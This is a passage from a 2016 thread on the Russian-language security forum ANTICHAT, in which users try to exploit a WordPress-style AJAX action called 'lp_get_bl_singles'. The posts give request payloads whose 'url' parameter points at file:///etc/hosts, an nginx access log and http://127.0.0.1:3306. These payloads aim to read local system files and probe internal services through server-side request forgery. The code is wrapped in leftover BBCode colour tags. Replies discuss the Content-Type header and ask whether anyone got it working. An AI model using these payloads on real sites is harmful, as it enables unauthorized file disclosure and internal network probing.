HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.09.2016, 14:13
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Мне ничего кроме, сканирование, и чтение конфигов не приходит в голову

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//127.0.0.1:3306

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///etc/hosts
[/COLOR][/COLOR
надо конфиги смотреть, как вариант может получится прочитать конфиг на сайте, но не уверен, всё таки пхп как текст может не отдаться
 
Ответить с цитированием

  #12  
Старый 28.09.2016, 14:15
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///home/log/nginx/default.access.log[/COLOR][/COLOR] 
 
Ответить с цитированием

  #13  
Старый 28.09.2016, 14:16
androd
Guest
Сообщений: n/a
Провел на форуме:
5429

Репутация: 2
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Мне ничего кроме, сканирование, и чтение конфигов не приходит в голову
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//127.0.0.1:3306

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///etc/hosts
[/COLOR][/COLOR
надо конфиги смотреть, как вариант может получится прочитать конфиг на сайте, но не уверен, всё таки пхп как текст может не отдаться
Content-Type: application/x-www-form-urlencoded

В этой строке кроется весь смысл....
 
Ответить с цитированием

  #14  
Старый 30.09.2016, 10:09
androd
Guest
Сообщений: n/a
Провел на форуме:
5429

Репутация: 2
По умолчанию

Вышло у кого что нибудь?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ